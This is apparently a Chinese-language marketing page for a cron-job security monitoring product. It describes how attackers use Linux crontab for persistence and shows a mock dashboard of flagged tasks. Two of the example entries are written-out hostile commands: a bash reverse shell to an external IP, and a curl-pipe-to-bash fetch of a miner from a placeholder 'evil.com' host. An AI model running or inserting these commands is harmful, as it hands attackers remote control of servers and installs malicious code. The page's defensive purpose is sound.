🕐 持久化攻击检测 · 定时任务安全监控

Cron 任务 安全监控

实时监控Linux计划任务(Crontab)的异常变动,防止攻击者利用定时任务实现持久化驻留、反弹Shell和挖矿程序植入

0
监控任务数
0
今日异常告警
0
阻断恶意任务
0
安全运行天数
// PERSISTENCE THREATS

Cron 被滥用的 常见场景

攻击者获得服务器权限后,第一件事往往就是植入定时任务

🐚

定时反弹Shell

每5分钟自动向C2服务器发起反向连接,即使Shell被杀也能自动恢复

⛏️

挖矿程序驻留

利用Cron定时拉取并启动挖矿程序,并设置守护进程防止被kill

📤

数据定时外传

定时打包敏感数据并通过DNS隧道或HTTPS外传到攻击者服务器

🔄

后门自恢复

定时检测后门是否被清除,如被清除则自动重新下载部署

🔑

SSH公钥持久化

定时检查并恢复攻击者的SSH公钥到authorized_keys文件

🤖

僵尸网络节点

利用Cron将服务器加入僵尸网络,定时执行DDoS攻击指令

// LIVE MONITORING

实时 监控面板

✓ 正常
系统日志轮转*/10 * * * * logrotate

最后执行: 2026-07-30 10:20 · 用户: root · 来源: 系统内置

✓ 正常
证书自动续期0 3 * * * certbot renew

最后执行: 2026-07-30 03:00 · 用户: root · 来源: certbot

⚠ 阻断
疑似反弹Shell*/5 * * * * bash -c 'bash -i >& /dev/tcp/45.x.x.187/4444 0>&1'

检测时间: 2026-07-30 09:15 · 用户: www-data · 已自动禁用

⚠ 阻断
疑似挖矿程序@reboot curl -s hxxp://evil.com/xmrig | bash

检测时间: 2026-07-29 22:40 · 用户: nobody · 已自动清除

✓ 正常
数据库自动备份0 2 * * * /opt/backup_db.sh

最后执行: 2026-07-30 02:00 · 用户: backup · 白名单

// FAQ

常见 问题解答

Cron监控会影响正常的计划任务吗?
不会。Cron监控采用旁路监听模式,读取crontab文件进行安全分析,不会修改或中断任何正常的计划任务执行。正常任务会记录到白名单中。
支持哪些Cron变体的监控?
支持:/etc/crontab、/var/spool/cron/、/etc/cron.d/、/etc/cron.hourly|daily|weekly|monthly/、anacron、systemd timer 等所有Linux计划任务机制。
发现恶意任务后会自动处理吗?
提供三种处理模式:仅告警(只记录不处理)、自动禁用(将恶意任务注释掉并备份)、自动清除+溯源(清除任务并追踪任务来源)。

别让Cron成为攻击者的后门

AegisX 7×24监控所有计划任务变动,第一时间发现持久化攻击